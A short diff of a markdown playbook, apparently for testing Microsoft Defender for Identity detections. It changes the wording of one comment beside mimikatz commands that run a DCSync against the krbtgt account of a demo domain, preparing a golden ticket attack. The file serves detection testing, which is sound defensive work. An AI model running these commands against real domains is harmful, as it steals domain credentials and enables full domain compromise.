DanielpFR/MDI/MDI_Playbook_Sample.md

 From a command line run :

 *mimikatz # privilege::debug*
-*mimikatz # lsadump::dcsync /domain:msdemo.local /user:krbtgt*  => to retrieve the krbtgt's password hash to move to a golden ticket attack
+*mimikatz # lsadump::dcsync /domain:msdemo.local /user:krbtgt*  => to retrieve the krbtgt's password hash and move to a golden ticket attack

 Tools available from : https://github.com/gentilkiwi/mimikatz/releases